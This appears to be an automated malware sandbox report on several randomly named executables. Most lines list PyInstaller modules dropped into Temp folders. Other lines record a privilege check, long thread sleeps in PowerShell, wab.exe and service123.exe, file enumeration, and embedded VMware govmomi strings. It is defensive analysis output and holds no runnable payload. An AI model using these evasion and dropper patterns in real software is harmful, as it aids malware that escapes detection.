            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\PIL\_imagingcms.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_generator.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\_core\_multiarray_umath.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\_lzma.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\PIL\_imaging.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_sfc64.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\random\mtrand.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\random\bit_generator.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\PIL\_imaging.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\random\_philox.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\PIL\_imagingtk.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\linalg\_umath_linalg.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\_lzma.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\random\mtrand.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\fft\_pocketfft_umath.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\random\_bounded_integers.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\random\_philox.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\_ssl.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\_socket.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\linalg\_umath_linalg.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\_wmi.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\select.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\random\_bounded_integers.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\random\_generator.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\fft\_pocketfft_umath.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\_queue.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\_lzma.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\PIL\_imagingtk.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\_core\_multiarray_tests.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\win32\win32gui.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\random\_common.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\_bz2.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\python312.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\_queue.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\_bz2.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\python312.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\PIL\_imagingmath.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\select.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\random\_pcg64.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\win32\win32pdh.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\_core\_multiarray_tests.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_pcg64.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\PIL\_webp.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\select.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\linalg\_umath_linalg.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\random\_sfc64.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\win32\win32gui.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\_decimal.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\PIL\_webp.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\PIL\_imagingmath.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\_tkinter.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\PIL\_imaging.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\PIL\_imagingtk.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\PIL\_webp.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\_core\_multiarray_umath.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\random\_mt19937.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\random\bit_generator.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\_tkinter.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\_wmi.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\_ssl.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_philox.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\_tkinter.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\_ssl.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\_socket.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\win32\win32pdh.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\mtrand.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\win32\win32gui.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\PIL\_imagingcms.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\_decimal.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\_decimal.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\random\_common.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\_queue.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\python312.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\random\_mt19937.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_13-17516
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeAPI coverage: 5.0 %
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeAPI coverage: 0.1 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7676Thread sleep count: 73 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7668Thread sleep count: 57 > 30
            Source: C:\Users\user\AppData\Local\Temp\service123.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\service123.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE29280 FindFirstFileExW,FindClose,13_2_00007FF6AAE29280
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE283C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,13_2_00007FF6AAE283C0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE41874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,13_2_00007FF6AAE41874
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE29280 FindFirstFileExW,FindClose,20_2_00007FF6AAE29280
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE283C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,20_2_00007FF6AAE283C0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE41874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_00007FF6AAE41874
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DE0E70 FindFirstFileExW,FindClose,wcscpy_s,23_2_00007FFBA5DE0E70
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user\AppData
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user\AppData\Local
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user\Documents\desktop.ini
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*DrsSoftRuleViolationEvent).GetEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*GuestRegistryKeyParentVolatile).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VmInstanceUuidConflictEvent).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2450
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3781
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VmMacAssignedEvent).GetVmEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3780
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*PlacementAction).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*DVPortgroupReconfiguredEvent).GetEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1128
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1129
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2459
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfNoSpaceOnControllerFault).GetOvfFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1120
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2452
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3783
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualAHCIController).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1121
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2451
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3782
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1122
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2454
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3785
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1123
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2453
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3784
